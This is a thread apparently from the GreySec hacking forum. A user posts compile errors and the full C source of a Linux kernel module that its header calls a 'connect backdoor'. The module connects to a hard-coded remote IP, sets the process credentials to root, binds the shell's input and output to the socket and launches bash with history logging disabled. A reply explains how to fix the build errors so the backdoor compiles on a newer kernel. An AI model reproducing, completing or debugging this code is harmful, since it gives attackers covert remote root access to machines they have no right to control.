GreySec Forums

Full Version: linux lkm
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
[root@localhost test1]# make
make -C /lib/modules/2.6.32-642.el6.x86_64/build M=/root/test1 modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.el6.x86_64'
  CC [M]  /root/test1/1.o
/root/test1/1.c: In function ‘k_connect’:
/root/test1/1.c:62: error: too few arguments to function ‘sock_map_fd’
/root/test1/1.c:86: error: ‘struct task_struct’ has no member named ‘uid’
/root/test1/1.c:87: error: ‘struct task_struct’ has no member named ‘euid’
/root/test1/1.c:88: error: ‘struct task_struct’ has no member named ‘gid’
/root/test1/1.c:89: error: ‘struct task_struct’ has no member named ‘egid’
/root/test1/1.c:95: error: implicit declaration of function ‘execve’
/root/test1/1.c:48: warning: unused variable ‘newsock’
make[2]: *** [/root/test1/1.o] Error 1
make[1]: *** [_module_/root/test1] Error 2
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.el6.x86_64'
make: *** [all] Error 2
[root@localhost test1]# uname -a
Linux localhost.localdomain 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost test1]# cat /etc/issue
CentOS release 6.8 (Final)
Kernel \r on an \m

[root@localhost test1]#

[root@localhost test1]# cat 1.c
/*
 *  * Kernel mode connect backdoor,haha~
 *   *
 *    * just a demo module to teach you how to write a backdoor in kernel mode,
 *     * i belive you can add more code to make it strong and powerful,wulala.
 *      *
 *       * by wzt <wzt#xsec.org>
 *        *
 *         */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/types.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include "syscalls.h"

#define REMOTO_IP "192.168.75.1"
#define port 1080

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

char *env[]={
 "TERM=linux",
 "HOME=/",
 "PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"
 ":/usr/local/sbin",
 "HISTFILE=/dev/null",
 NULL };

int k_connect(void)
{
 struct task_struct *tsk = current;
 struct socket *sock,*newsock;
 struct sockaddr_in server;
 int sockfd,i;
 int error = 0,len = sizeof(struct sockaddr);

 set_fs(KERNEL_DS);

 error = sock_create(AF_INET,SOCK_STREAM,0,&sock);
 if (error < 0) {
 printk("[-] socket_create failed: %d\n",error);
 sock_release(sock);
 return -1;
 }

 sockfd = sock_map_fd(sock);
 if (sockfd < 0) {
 printk("[-] sock_map_fd() failed.\n");
 sock_release(sock);
 return -1;
 }

 for (i = 0; i < 8; i++)
 server.sin_zero[i] = 0;

 server.sin_family = PF_INET;
 server.sin_addr.s_addr = in_aton(REMOTO_IP);
 server.sin_port = htons(port);

 error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);
 if (error < 0) {
 printk("[-] connect to %s failed.\n",REMOTO_IP);
 return -1;
 }

 printk("[+] connect to %s ok.\n",REMOTO_IP);

 set_fs(KERNEL_DS);

 tsk->uid = 0;
 tsk->euid = 0;
 tsk->gid = 0x11111111;
 tsk->egid = 0;

 dup2(sockfd,0);
 dup2(sockfd,1);
 dup2(sockfd,2);

 execve(earg[0], (const char **) earg, (const char **) env);

 return 1;
}

int k_socket_init(void)
{
 printk("[+] kernel socket test start.\n");

 k_connect();
}

void k_socket_exit(void)
{
 printk("[+] kernel socket test over.\n");
}

module_init(k_socket_init);
module_exit(k_socket_exit);



[root@localhost test1]#

[root@localhost test1]# cat syscalls.h
/* macros de syscalls */

int errno;

#define my__syscall_return(type, res) \
do { \
    if ((unsigned long)(res) >= (unsigned long)(-(128 + 1))) { \
        errno = -(res); \
        res = -1; \
    } \
    return (type) (res); \
} while (0)

/* XXX - _foo needs to be __foo, while __NR_bar could be _NR_bar. */
#define my_syscall0(type,name) \
type name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name)); \
my__syscall_return(type,__res); \
}

#define my_syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall2(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)) \
    : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
          "d" ((long)(arg3)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "0" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
      "d" ((long)(arg3)),"S" ((long)(arg4)) : "memory"); \
my__syscall_return(type,__res); \
}

#define my_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
      type5,arg5) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("push %%ebx ; movl %2,%%ebx ; movl %1,%%eax ; " \
                  "int $0x80 ; pop %%ebx" \
    : "=a" (__res) \
    : "i" (__NR_##name),"ri" ((long)(arg1)),"c" ((long)(arg2)), \
      "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)) \
    : "memory"); \
my__syscall_return(type,__res); \
}



[root@localhost test1]# cat Makefile
obj-m := 1.o
CC = gcc -Wall
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

all:
        $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
        $(MAKE) -C $(KDIR) M=$(PWD) clean
[root@localhost test1]#
I can't seem to see your question, I'll consider that you were asking about the errors you are showing in the building process.

The errors are in file /root/test1/1.c as the make file shows:
- On line 62, you provided a single parameter to sock_map_fd(), while it takes two parameters, check out this:
http://lxr.free-electrons.com/source/net/socket.c#L433

- On lines 86,87,88,89, you used some members that weren't declared in the task_struct struct, when I google'd that struct, I found that it did contain those members (uid, euid, gid, egid), even though it's the same context, not sure if both of you and the link are referring to the same task_struct, here is the link I found:
http://www.tldp.org/LDP/tlk/ds/ds.html

- On line 95, an implicit declaration of a function execve was made, which means you used a function you used before declaring it. You need either to declare it before the line it was executed at, or create a prototype for the function before the line it was executed at. Actually, since that (linux/unistd.h) points to (asm/unistd.h) which points to another system library, you might try editing the source (after backing up the current version of the file) adding the inclusion of (unistd.h), in the man page of execve() it shows it resides to the unistd.h, which points to the file /usr/include/unistd.h ,while the others at /usr/include/(linux|asm)/unistd.h

I did some kernel development years ago, it's been a while so that might (not be|be) helpful.